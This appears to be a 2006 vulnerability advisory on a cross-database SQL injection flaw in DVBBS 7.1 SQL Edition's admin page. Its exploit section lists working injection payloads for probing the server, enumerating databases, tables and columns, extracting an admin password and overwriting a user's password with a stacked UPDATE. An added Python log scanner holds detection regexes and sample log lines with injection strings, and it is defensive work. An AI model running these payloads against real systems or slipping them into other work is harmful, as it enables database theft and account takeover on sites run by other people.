DVBBS 7.1 SQL Edition cross-database vulnerability

2006-03-21T00:00:00
ID MYHACK58:6220068215
Type myhack58
Reporter Anonymous
Modified 2006-03-21T00:00:00

Description

Author: Gui brother
Article source: www.54nb.cn
Vulnerability test environment: DVBBS 7.1 SQL

Affected files: admin/admin.asp .....

Exploit

(select @@version)>0 -- obtain the Windows version number
and user_name()='dbo' -- determine whether the current system user is sa
(select user_name())>0 -- reveal the current system's connected user
(select db_name())>0 -- get the currently connected database
(select IS_MEMBER('db_owner')) -- query the current user's permissions on the database

(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) -- query all the database names
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') -- query a table name in the database
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) -- query all table names in the database
(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) -- query the ID of the table
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) -- query a field name
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) -- query all field names
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -- query the user
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -- query the password of the user bluefire
;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--
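
The probe strings above share a few recognizable shapes (a subquery compared to a number, system catalog names, three-part `db.dbo.table` references, a stacked write), which makes them easy to find in IIS request logs. The following is an added detection example, not part of the original advisory: the log field order is an assumption, and `PARAM`, `OtherDb` and `SomeTable` are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the probe strings listed in this advisory.
SIGNATURES = {
    "server_recon": re.compile(r"@@version|\b(?:user_name|db_name|is_member)\s*\(", re.I),
    "error_based_compare": re.compile(r"\(\s*select\b.*?\)\s*>\s*\d", re.I),
    "catalog_enum": re.compile(r"\bsys(?:objects|columns|databases)\b", re.I),
    "cross_db_reference": re.compile(r"\b[a-z_]\w*\.dbo\.\w+", re.I),
    "stacked_write": re.compile(r";\s*(?:update|insert|delete|drop|exec)\b", re.I),
}

def normalize(query, max_rounds=3):
    """Undo nested URL encoding and collapse whitespace so signatures match."""
    for _ in range(max_rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query)

def scan_line(line):
    """Return sorted signature names hit by one W3C log line ([] if clean)."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 6:
        return []
    # Assumed field order: date time cs-method cs-uri-stem cs-uri-query sc-status
    query = normalize(fields[4])
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def scan_log(text):
    """Map 1-based line numbers to their signature hits, skipping clean lines."""
    hits = {}
    for number, line in enumerate(text.splitlines(), 1):
        found = scan_line(line)
        if found:
            hits[number] = found
    return hits

# Constructed sample log; PARAM, OtherDb and SomeTable are placeholders.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2006-03-21 10:00:01 GET /index.asp boardid=1 200
2006-03-21 10:00:07 GET /admin/admin.asp PARAM=1+and+(select+@@version)>0 500
2006-03-21 10:00:09 GET /admin/admin.asp PARAM=1%2520and%2520(select%2520count(*)%2520from%2520OtherDb.dbo.sysobjects)>0 500
2006-03-21 10:00:12 GET /admin/admin.asp PARAM=1;update+OtherDb.dbo.SomeTable+set+col=1-- 200
"""

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG).items():
        print(number, ", ".join(found))
```

The `cross_db_reference` signature is a heuristic for any three-part name and is most useful when the web application's own queries never leave its database.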